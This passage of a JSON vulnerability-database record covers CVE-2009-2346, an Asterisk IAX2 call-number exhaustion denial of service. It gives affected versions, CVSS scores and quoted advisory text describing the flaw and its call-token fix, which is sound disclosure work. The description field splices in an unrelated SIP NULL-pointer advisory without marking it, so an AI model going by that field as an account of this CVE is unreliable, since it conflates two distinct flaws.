        "model": "open source",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "asterisk",
        "version": "1.4.3"
      },
      {
        "model": "asterisk",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "asterisk",
        "version": "c.1.10.5"
      },
      {
        "model": "open source",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "asterisk",
        "version": "1.2.6"
      },
      {
        "model": "open source",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "asterisk",
        "version": "1.2.20"
      },
      {
        "model": "open source",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "asterisk",
        "version": "1.4.4"
      },
      {
        "model": "open source",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "asterisk",
        "version": "1.4.11"
      },
      {
        "model": "asterisk",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "asterisk",
        "version": "b.2.5.6"
      },
      {
        "model": "open source",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "asterisk",
        "version": "1.4.2"
      },
      {
        "model": "asterisk",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "asterisk",
        "version": "c.1.6.2"
      },
      {
        "model": "open source",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "asterisk",
        "version": "1.2.8"
      },
      {
        "model": "open source",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "asterisk",
        "version": "1.2.28"
      },
      {
        "model": "open source",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "asterisk",
        "version": "1.6.1.5"
      },
      {
        "model": "asterisk",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "asterisk",
        "version": "b.1.3.3"
      },
      {
        "model": "open source",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "asterisk",
        "version": "1.2.30.2"
      },
      {
        "model": "open source",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "asterisk",
        "version": "1.4.22.2"
      },
      {
        "model": "open source",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "asterisk",
        "version": "1.4.6"
      },
      {
        "model": "open source",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "asterisk",
        "version": "1.4.12.1"
      },
      {
        "model": "open source",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "asterisk",
        "version": "1.2.25"
      },
      {
        "model": "opensource",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "asterisk",
        "version": "1.4.26.1"
      },
      {
        "model": "open source",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "asterisk",
        "version": "1.4.10"
      },
      {
        "model": "open source",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "asterisk",
        "version": "1.2.15"
      },
      {
        "model": "open source",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "asterisk",
        "version": "1.2.26"
      },
      {
        "model": "asterisk",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "asterisk",
        "version": "b.2.3.5"
      },
      {
        "model": "open source",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "asterisk",
        "version": "1.4.5"
      },
      {
        "model": "open source",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "asterisk",
        "version": "1.2.4"
      },
      {
        "model": "open source",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "asterisk",
        "version": "1.4.16.1"
      },
      {
        "model": "open source",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "asterisk",
        "version": "1.4.18.1"
      },
      {
        "model": "asterisk",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "asterisk",
        "version": "b.2.2.1"
      },
      {
        "model": "asterisk",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "asterisk",
        "version": "b.2.3.4"
      },
      {
        "model": "open source",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "asterisk",
        "version": "1.2.0"
      },
      {
        "model": "asterisk",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "asterisk",
        "version": "c.1.10.3"
      },
      {
        "model": "open source",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "asterisk",
        "version": "1.4.22"
      },
      {
        "model": "open source",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "asterisk",
        "version": "1.4.20"
      },
      {
        "model": "open source",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "asterisk",
        "version": "1.2.24"
      },
      {
        "model": "open source",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "asterisk",
        "version": "1.2.29"
      },
      {
        "model": "appliance s800i",
        "scope": "lt",
        "trust": 0.8,
        "vendor": "digium",
        "version": "1.3.x"
      },
      {
        "model": "asterisk",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "digium",
        "version": "business edition of  b.2.5.10"
      },
      {
        "model": "asterisk",
        "scope": "lt",
        "trust": 0.8,
        "vendor": "digium",
        "version": "b.x.x"
      },
      {
        "model": "asterisk open source",
        "scope": "lt",
        "trust": 0.8,
        "vendor": "digium",
        "version": "1.4.x"
      },
      {
        "model": "asterisk open source",
        "scope": "lt",
        "trust": 0.8,
        "vendor": "digium",
        "version": "1.6.0.x"
      },
      {
        "model": "asterisk open source",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "digium",
        "version": "1.6.0.15"
      },
      {
        "model": "asterisk open source",
        "scope": "lt",
        "trust": 0.8,
        "vendor": "digium",
        "version": "1.2.x"
      },
      {
        "model": "asterisk",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "digium",
        "version": "c.2.4.3"
      },
      {
        "model": "asterisk open source",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "digium",
        "version": "1.4.26.2"
      },
      {
        "model": "asterisk open source",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "digium",
        "version": "1.2.35"
      },
      {
        "model": "asterisk",
        "scope": "lt",
        "trust": 0.8,
        "vendor": "digium",
        "version": "c.2.4.3"
      },
      {
        "model": "asterisk",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "digium",
        "version": "c.3.1.1"
      },
      {
        "model": "asterisk open source",
        "scope": "lt",
        "trust": 0.8,
        "vendor": "digium",
        "version": "1.6.1.x"
      },
      {
        "model": "appliance s800i",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "digium",
        "version": "1.3.0.3"
      },
      {
        "model": "asterisk open source",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "digium",
        "version": "1.6.1.6"
      },
      {
        "model": "asterisk",
        "scope": "lt",
        "trust": 0.8,
        "vendor": "digium",
        "version": "c.3.x"
      },
      {
        "model": "linux",
        "scope": null,
        "trust": 0.3,
        "vendor": "gentoo",
        "version": null
      },
      {
        "model": "s800i appliance",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "asterisk",
        "version": "1.3.2"
      },
      {
        "model": "s800i appliance",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "asterisk",
        "version": "1.3"
      },
      {
        "model": "business edition c.3.1.0",
        "scope": null,
        "trust": 0.3,
        "vendor": "asterisk",
        "version": null
      },
      {
        "model": "business edition c.2.4.2",
        "scope": null,
        "trust": 0.3,
        "vendor": "asterisk",
        "version": null
      },
      {
        "model": "business edition c.2.3.3",
        "scope": null,
        "trust": 0.3,
        "vendor": "asterisk",
        "version": null
      },
      {
        "model": "business edition c.2.3",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "asterisk",
        "version": ".2"
      },
      {
        "model": "business edition c.2.3",
        "scope": null,
        "trust": 0.3,
        "vendor": "asterisk",
        "version": null
      },
      {
        "model": "business edition c.2.1.2.1",
        "scope": null,
        "trust": 0.3,
        "vendor": "asterisk",
        "version": null
      },
      {
        "model": "business edition c.1.8.1",
        "scope": null,
        "trust": 0.3,
        "vendor": "asterisk",
        "version": null
      },
      {
        "model": "business edition c.1.6.2",
        "scope": null,
        "trust": 0.3,
        "vendor": "asterisk",
        "version": null
      },
      {
        "model": "business edition c.1.6.1",
        "scope": null,
        "trust": 0.3,
        "vendor": "asterisk",
        "version": null
      },
      {
        "model": "business edition c.1.6",
        "scope": null,
        "trust": 0.3,
        "vendor": "asterisk",
        "version": null
      },
      {
        "model": "business edition c.1.10.5",
        "scope": null,
        "trust": 0.3,
        "vendor": "asterisk",
        "version": null
      },
      {
        "model": "business edition c.1.10.4",
        "scope": null,
        "trust": 0.3,
        "vendor": "asterisk",
        "version": null
      },
      {
        "model": "business edition c.1.10.3",
        "scope": null,
        "trust": 0.3,
        "vendor": "asterisk",
        "version": null
      },
      {
        "model": "business edition c.1.0-beta8",
        "scope": null,
        "trust": 0.3,
        "vendor": "asterisk",
        "version": null
      },
      {
        "model": "business edition c.1.0-beta7",
        "scope": null,
        "trust": 0.3,
        "vendor": "asterisk",
        "version": null
      },
      {
        "model": "business edition b.2.5.9",
        "scope": null,
        "trust": 0.3,
        "vendor": "asterisk",
        "version": null
      },
      {
        "model": "business edition b.2.5.8",
        "scope": null,
        "trust": 0.3,
        "vendor": "asterisk",
        "version": null
      },
      {
        "model": "business edition b.2.5.6",
        "scope": null,
        "trust": 0.3,
        "vendor": "asterisk",
        "version": null
      },
      {
        "model": "business edition b.2.5.5",
        "scope": null,
        "trust": 0.3,
        "vendor": "asterisk",
        "version": null
      },
      {
        "model": "business edition b.2.5.4",
        "scope": null,
        "trust": 0.3,
        "vendor": "asterisk",
        "version": null
      },
      {
        "model": "business edition b.2.5.3",
        "scope": null,
        "trust": 0.3,
        "vendor": "asterisk",
        "version": null
      },
      {
        "model": "business edition b.2.5.2",
        "scope": null,
        "trust": 0.3,
        "vendor": "asterisk",
        "version": null
      },
      {
        "model": "business edition b.2.5.1",
        "scope": null,
        "trust": 0.3,
        "vendor": "asterisk",
        "version": null
      },
      {
        "model": "business edition b.2.5",
        "scope": null,
        "trust": 0.3,
        "vendor": "asterisk",
        "version": null
      },
      {
        "model": "business edition b.2.3.6",
        "scope": null,
        "trust": 0.3,
        "vendor": "asterisk",
        "version": null
      },
      {
        "model": "business edition b.2.3.5",
        "scope": null,
        "trust": 0.3,
        "vendor": "asterisk",
        "version": null
      },
      {
        "model": "business edition b.2.3.4",
        "scope": null,
        "trust": 0.3,
        "vendor": "asterisk",
        "version": null
      },
      {
        "model": "business edition b.2.3.3",
        "scope": null,
        "trust": 0.3,
        "vendor": "asterisk",
        "version": null
      },
      {
        "model": "business edition b.2.3.2",
        "scope": null,
        "trust": 0.3,
        "vendor": "asterisk",
        "version": null
      },
      {
        "model": "business edition b.2.3.1",
        "scope": null,
        "trust": 0.3,
        "vendor": "asterisk",
        "version": null
      },
      {
        "model": "business edition b.2.2.1",
        "scope": null,
        "trust": 0.3,
        "vendor": "asterisk",
        "version": null
      },
      {
        "model": "business edition b.2.2.0",
        "scope": null,
        "trust": 0.3,
        "vendor": "asterisk",
        "version": null
      },
      {
        "model": "business edition b.1.3.3",
        "scope": null,
        "trust": 0.3,
        "vendor": "asterisk",
        "version": null
      },
      {
        "model": "business edition b.1.3.2",
        "scope": null,
        "trust": 0.3,
        "vendor": "asterisk",
        "version": null
      },
      {
        "model": "0-rc2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "asterisk",
        "version": "1.6.1"
      },
      {
        "model": "0-rc1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "asterisk",
        "version": "1.6.1"
      },
      {
        "model": "asterisk",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "asterisk",
        "version": "1.6.1.5"
      },
      {
        "model": "asterisk",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "asterisk",
        "version": "1.6.1"
      },
      {
        "model": "beta6",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "asterisk",
        "version": "1.6"
      },
      {
        "model": "asterisk",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "asterisk",
        "version": "1.66"
      },
      {
        "model": "asterisk",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "asterisk",
        "version": "1.6.8"
      },
      {
        "model": "asterisk",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "asterisk",
        "version": "1.4.26"
      },
      {
        "model": "asterisk",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "asterisk",
        "version": "1.4.24.1"
      },
      {
        "model": "asterisk",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "asterisk",
        "version": "1.4.24"
      },
      {
        "model": "asterisk",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "asterisk",
        "version": "1.4.23.2"
      },
      {
        "model": "asterisk",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "asterisk",
        "version": "1.4.23.1"
      },
      {
        "model": "asterisk",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "asterisk",
        "version": "1.4.23"
      },
      {
        "model": "asterisk",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "asterisk",
        "version": "1.4.22"
      },
      {
        "model": "asterisk",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "asterisk",
        "version": "1.4.19.1"
      },
      {
        "model": "-rc3",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "asterisk",
        "version": "1.4.19"
      },
      {
        "model": "asterisk",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "asterisk",
        "version": "1.4.19"
      },
      {
        "model": "asterisk",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "asterisk",
        "version": "1.4.18"
      },
      {
        "model": "asterisk",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "asterisk",
        "version": "1.4.17"
      },
      {
        "model": "asterisk",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "asterisk",
        "version": "1.4.16"
      },
      {
        "model": "asterisk",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "asterisk",
        "version": "1.4.15"
      },
      {
        "model": "asterisk",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "asterisk",
        "version": "1.4.14"
      },
      {
        "model": "asterisk",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "asterisk",
        "version": "1.4.13"
      },
      {
        "model": "asterisk",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "asterisk",
        "version": "1.4.12"
      },
      {
        "model": "asterisk",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "asterisk",
        "version": "1.4.11"
      },
      {
        "model": "asterisk",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "asterisk",
        "version": "1.4.10"
      },
      {
        "model": "asterisk",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "asterisk",
        "version": "1.4.9"
      },
      {
        "model": "asterisk",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "asterisk",
        "version": "1.4.8"
      },
      {
        "model": "asterisk",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "asterisk",
        "version": "1.4.7"
      },
      {
        "model": "asterisk",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "asterisk",
        "version": "1.4.6"
      },
      {
        "model": "asterisk",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "asterisk",
        "version": "1.4.5"
      },
      {
        "model": "asterisk",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "asterisk",
        "version": "1.4.4"
      },
      {
        "model": "asterisk",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "asterisk",
        "version": "1.4.3"
      },
      {
        "model": "asterisk",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "asterisk",
        "version": "1.4.2"
      },
      {
        "model": "asterisk",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "asterisk",
        "version": "1.4.1"
      },
      {
        "model": "asterisk",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "asterisk",
        "version": "1.2.34"
      },
      {
        "model": "asterisk",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "asterisk",
        "version": "1.2.33"
      },
      {
        "model": "asterisk",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "asterisk",
        "version": "1.2.32"
      },
      {
        "model": "asterisk",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "asterisk",
        "version": "1.2.31"
      },
      {
        "model": "asterisk",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "asterisk",
        "version": "1.2.30"
      },
      {
        "model": "asterisk",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "asterisk",
        "version": "1.2.29"
      },
      {
        "model": "asterisk",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "asterisk",
        "version": "1.2.28"
      },
      {
        "model": "asterisk",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "asterisk",
        "version": "1.2.27"
      },
      {
        "model": "asterisk",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "asterisk",
        "version": "1.2.26"
      },
      {
        "model": "asterisk",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "asterisk",
        "version": "1.2.25"
      },
      {
        "model": "asterisk",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "asterisk",
        "version": "1.2.24"
      },
      {
        "model": "asterisk",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "asterisk",
        "version": "1.2.23"
      },
      {
        "model": "asterisk",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "asterisk",
        "version": "1.2.22"
      },
      {
        "model": "asterisk",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "asterisk",
        "version": "1.2.21"
      },
      {
        "model": "asterisk",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "asterisk",
        "version": "1.2.19"
      },
      {
        "model": "asterisk",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "asterisk",
        "version": "1.2.18"
      },
      {
        "model": "asterisk",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "asterisk",
        "version": "1.2.17"
      },
      {
        "model": "asterisk",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "asterisk",
        "version": "1.2.16"
      },
      {
        "model": "asterisk",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "asterisk",
        "version": "1.2.15"
      },
      {
        "model": "asterisk",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "asterisk",
        "version": "1.2.14"
      },
      {
        "model": "asterisk",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "asterisk",
        "version": "1.2.13"
      },
      {
        "model": "asterisk",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "asterisk",
        "version": "1.2.11"
      },
      {
        "model": "asterisk",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "asterisk",
        "version": "1.2.10"
      },
      {
        "model": "asterisk",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "asterisk",
        "version": "1.2.9"
      },
      {
        "model": "asterisk",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "asterisk",
        "version": "1.2.8"
      },
      {
        "model": "asterisk",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "asterisk",
        "version": "1.2.7"
      },
      {
        "model": "asterisk",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "asterisk",
        "version": "1.2.6"
      },
      {
        "model": "asterisk",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "asterisk",
        "version": "1.2.5"
      },
      {
        "model": ".0-beta2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "asterisk",
        "version": "1.2"
      },
      {
        "model": ".0-beta1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "asterisk",
        "version": "1.2"
      },
      {
        "model": "asterisk",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "asterisk",
        "version": "1.6.0.3"
      },
      {
        "model": "asterisk",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "asterisk",
        "version": "1.6.0.14"
      },
      {
        "model": "asterisk",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "asterisk",
        "version": "1.6"
      },
      {
        "model": "asterisk",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "asterisk",
        "version": "1.4.26.1"
      },
      {
        "model": "asterisk",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "asterisk",
        "version": "1.4.22.1"
      },
      {
        "model": "asterisk",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "asterisk",
        "version": "1.4.21.2"
      },
      {
        "model": "asterisk",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "asterisk",
        "version": "1.4.18.1"
      },
      {
        "model": "revision",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "asterisk",
        "version": "1.495946"
      },
      {
        "model": "beta",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "asterisk",
        "version": "1.4"
      },
      {
        "model": "asterisk",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "asterisk",
        "version": "1.2.30.4"
      },
      {
        "model": "asterisk",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "asterisk",
        "version": "1.2.30.3"
      },
      {
        "model": "s800i appliance",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "asterisk",
        "version": "1.3.0.3"
      },
      {
        "model": "business edition c.3.1",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "asterisk",
        "version": "1"
      },
      {
        "model": "business edition c.2.4.3",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "asterisk",
        "version": null
      },
      {
        "model": "business edition b.2.5.10",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "asterisk",
        "version": null
      },
      {
        "model": "asterisk",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "asterisk",
        "version": "1.6.1.6"
      },
      {
        "model": "asterisk",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "asterisk",
        "version": "1.2.35"
      },
      {
        "model": "asterisk",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "asterisk",
        "version": "1.6.0.15"
      },
      {
        "model": "asterisk",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "asterisk",
        "version": "1.4.26.2"
      }
    ],
    "sources": [
      {
        "db": "BID",
        "id": "36275"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2009-003591"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-200909-091"
      },
      {
        "db": "NVD",
        "id": "CVE-2009-2346"
      }
    ]
  },
  "configurations": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/configurations#",
      "children": {
        "@container": "@list"
      },
      "cpe_match": {
        "@container": "@list"
      },
      "data": {
        "@container": "@list"
      },
      "nodes": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "CVE_data_version": "4.0",
        "nodes": [
          {
            "cpe_match": [
              {
                "cpe22Uri": "cpe:/h:digium:appliance_s800i",
                "vulnerable": true
              },
              {
                "cpe22Uri": "cpe:/a:digium:asterisk",
                "vulnerable": true
              },
              {
                "cpe22Uri": "cpe:/a:digium:open_source",
                "vulnerable": true
              }
            ],
            "operator": "OR"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2009-003591"
      }
    ]
  },
  "credits": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/credits#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Russell Bryant  russell@digium.com",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-200909-091"
      }
    ],
    "trust": 0.6
  },
  "cve": "CVE-2009-2346",
  "cvss": {
    "@context": {
      "cvssV2": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
      },
      "cvssV3": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
      },
      "severity": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/cvss/severity#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/severity"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "cvssV2": [
          {
            "accessComplexity": "LOW",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "nvd@nist.gov",
            "availabilityImpact": "COMPLETE",
            "baseScore": 7.8,
            "confidentialityImpact": "NONE",
            "exploitabilityScore": 10.0,
            "id": "CVE-2009-2346",
            "impactScore": 6.9,
            "integrityImpact": "NONE",
            "severity": "HIGH",
            "trust": 1.9,
            "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C",
            "version": "2.0"
          }
        ],
        "cvssV3": [],
        "severity": [
          {
            "author": "nvd@nist.gov",
            "id": "CVE-2009-2346",
            "trust": 1.0,
            "value": "HIGH"
          },
          {
            "author": "NVD",
            "id": "CVE-2009-2346",
            "trust": 0.8,
            "value": "High"
          },
          {
            "author": "CNNVD",
            "id": "CNNVD-200909-091",
            "trust": 0.6,
            "value": "HIGH"
          },
          {
            "author": "VULMON",
            "id": "CVE-2009-2346",
            "trust": 0.1,
            "value": "HIGH"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "VULMON",
        "id": "CVE-2009-2346"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2009-003591"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-200909-091"
      },
      {
        "db": "NVD",
        "id": "CVE-2009-2346"
      }
    ]
  },
  "description": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/description#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "The IAX2 protocol implementation in Asterisk Open Source 1.2.x before 1.2.35, 1.4.x before 1.4.26.2, 1.6.0.x before 1.6.0.15, and 1.6.1.x before 1.6.1.6; Business Edition B.x.x before B.2.5.10, C.2.x before C.2.4.3, and C.3.x before C.3.1.1; and s800i 1.3.x before 1.3.0.3 allows remote attackers to cause a denial of service (call-number exhaustion) by initiating many IAX2 message exchanges, a related issue to CVE-2008-3263. The problem is CVE-2008-3263 Related toBy a third party IAX2 Service operation disruption by starting message exchange ( Call number exhaustion ) There is a possibility of being put into a state. Asterisk is prone to a remote denial-of-service vulnerability because it fails to properly handle an excessive amount of call numbers. \nSuccessful exploits can cause the application to stop accepting connections, resulting in denial-of-service conditions for legitimate users. \n\nThe vulnerabilities are caused due to NULL-pointer dereference errors\nin the \"sip_uri_params_cmp()\" and \"sip_uri_headers_cmp()\" functions. \nThis can be exploited to crash the application via a SIP message\nlacking certain headers. \n\nSuccessful exploitation requires that the SIP channel driver is\nconfigured with the \"pedantic\" option enabled. \n\nPROVIDED AND/OR DISCOVERED BY:\nThe vendor credits bugs.digium.com user klaus3000.                Asterisk Project Security Advisory - AST-2009-006\n\n   +------------------------------------------------------------------------+\n   |      Product       | Asterisk                                          |\n   |--------------------+---------------------------------------------------|\n   |      Summary       | IAX2 Call Number Resource Exhaustion              |\n   |--------------------+---------------------------------------------------|\n   | Nature of Advisory | Denial of Service                                 |\n   |--------------------+---------------------------------------------------|\n   |   Susceptibility   | Remote unauthenticated sessions                   |\n   |--------------------+---------------------------------------------------|\n   |      Severity      | Major                                             |\n   |--------------------+---------------------------------------------------|\n   |   Exploits Known   | Yes - Published by Blake Cornell \u003c blake AT       |\n   |                    | remoteorigin DOT com \u003e on voip0day.com            |\n   |--------------------+---------------------------------------------------|\n   |    Reported On     | June 22, 2008                                     |\n   |--------------------+---------------------------------------------------|\n   |    Reported By     | Noam Rathaus \u003c noamr AT beyondsecurity DOT com \u003e, |\n   |                    | with his SSD program, also by Blake Cornell       |\n   |--------------------+---------------------------------------------------|\n   |     Posted On      | September 3, 2009                                 |\n   |--------------------+---------------------------------------------------|\n   |  Last Updated On   | September 3, 2009                                 |\n   |--------------------+---------------------------------------------------|\n   |  Advisory Contact  | Russell Bryant \u003c russell AT digium DOT com \u003e      |\n   |--------------------+---------------------------------------------------|\n   |      CVE Name      | CVE-2009-2346                                     |\n   +------------------------------------------------------------------------+\n\n   +------------------------------------------------------------------------+\n   | Description | The IAX2 protocol uses a call number to associate        |\n   |             | messages with the call that they belong to. However, the |\n   |             | protocol defines the call number field in messages as a  |\n   |             | fixed size 15 bit field. So, if all call numbers are in  |\n   |             | use, no additional sessions can be handled.              |\n   |             |                                                          |\n   |             | A call number gets created at the start of an IAX2       |\n   |             | message exchange. So, an attacker can send a large       |\n   |             | number of messages and consume the call number space.    |\n   |             | The attack is also possible using spoofed source IP      |\n   |             | addresses as no handshake is required before a call      |\n   |             | number is assigned.                                      |\n   +------------------------------------------------------------------------+\n\n   +------------------------------------------------------------------------+\n   | Resolution | Upgrade to a version of Asterisk listed in this document  |\n   |            | as containing the IAX2 protocol security enhancements. In |\n   |            | addition to upgrading, administrators should consult the  |\n   |            | users guide section of the IAX2 Security document         |\n   |            | (IAX2-security.pdf), as well as the sample configuration  |\n   |            | file for chan_iax2 that have been distributed with those  |\n   |            | releases for assistance with new options that have been   |\n   |            | provided.                                                 |\n   +------------------------------------------------------------------------+\n\n   +------------------------------------------------------------------------+\n   | Discussion | A lot of time was spent trying to come up with a way to   |\n   |            | resolve this issue in a way that was completely backwards |\n   |            | compatible. However, the final resolution ended up        |\n   |            | requiring a modification to the IAX2 protocol. This       |\n   |            | modification is referred to as call token validation.     |\n   |            | Call token validation is used as a handshake before call  |\n   |            | numbers are assigned to IAX2 connections.                 |\n   |            |                                                           |\n   |            | Call token validation by itself does not resolve the      |\n   |            | issue. However, it does allow an IAX2 server to validate  |\n   |            | that the source of the messages has not been spoofed. In  |\n   |            | addition to call token validation, Asterisk now also has  |\n   |            | the ability to limit the amount of call numbers assigned  |\n   |            | to a given remote IP address.                             |\n   |            |                                                           |\n   |            | The combination of call token validation and call number  |\n   |            | allocation limits is used to mitigate this denial of      |\n   |            | service issue.                                            |\n   |            |                                                           |\n   |            | An alternative approach to securing IAX2 would be to use  |\n   |            | a security layer on top of IAX2, such as DTLS [RFC4347]   |\n   |            | or IPsec [RFC4301]. All Rights Reserved. \n  Permission is hereby granted to distribute and publish this advisory in its\n                           original, unaltered form. \n\n_______________________________________________\nFull-Disclosure - We believe in it. \nCharter: 